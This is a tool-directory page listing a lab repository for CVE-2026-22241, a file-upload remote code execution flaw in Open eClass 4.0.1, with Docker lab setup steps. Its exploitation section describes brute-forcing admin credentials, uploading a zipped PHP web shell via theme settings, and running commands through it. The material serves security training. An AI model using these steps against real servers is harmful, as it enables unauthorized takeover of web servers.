Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-22241 — Lab Environment for CVE-2026-22241 | Kitploit
Tools/GitHubGitHub/cves-labs/cve-2026-22241
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubcves-labs/cve-2026-22241

CVE-2026-22241

Lab Environment for CVE-2026-22241

View Repository
472 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-22241

Lab Environment for CVE-2026-22241

Vulnerability Description:

  • Vulnerability: Unrestricted Upload of File with Dangerous Type.
  • Impact: Remote Code Execution (RCE).
  • Description: This flaw allows an attacker with administrative privileges to upload a malicious PHP file (Web Shell), leading to full compromise of the web server's integrity and security.
  • Target System: OpenClass Educational Infrastructure.

1. Build the environment

sudo git clone https://github.com/CVEs-Labs/CVE-2026-22241.git

open https://www.openeclass.org/en/previous-versions/ and download openeclass-4.0.1.zip

sudo apt update && sudo apt install docker.io docker-compose -y

sudo systemctl start docker

sudo cp openeclass-4.0.1.zip CVE-2026-22241

cd CVE-2026-22241

sudo mkdir html

sudo unzip openeclass-4.0.1.zip -d ./temp_folder

sudo mv ./temp_folder/openeclass-4.0.1/* ./html/

sudo rm -rf ./temp_folder

sudo rm -rf openeclass-4.0.1.zip

sudo chown -R $USER:www-data html/

sudo chmod -R 775 html/

sudo docker-compose up -d

sudo docker exec -it eclass-web bash -c "apt-get update && apt-get install -y libpng-dev libzip-dev libicu-dev libxml2-dev libldap2-dev && docker-php-ext-configure ldap --with-libdir=lib/x86_64-linux-gnu/ && docker-php-ext-install zip gd pdo pdo_mysql intl soap ldap && apache2ctl restart"

sudo docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' eclass-web

http://ip-docker

image
Download Tool

2. Exploit the vulnerability:

for keys list in ZAP (Brute Force): https://gitlab.com/kalilinux/packages/seclists/-/blob/kali/master/Passwords/Common-Credentials/Pwdb_top-1000.txt

zip poc.zip evil.php

in eclass page: go to admin tool -> theme settings -> then upload poc.zip

in new page:

http://ip-docker/courses/theme_data/evil.php?cmd=whoami

http://ip-docker/courses/theme_data/evil.php?cmd=id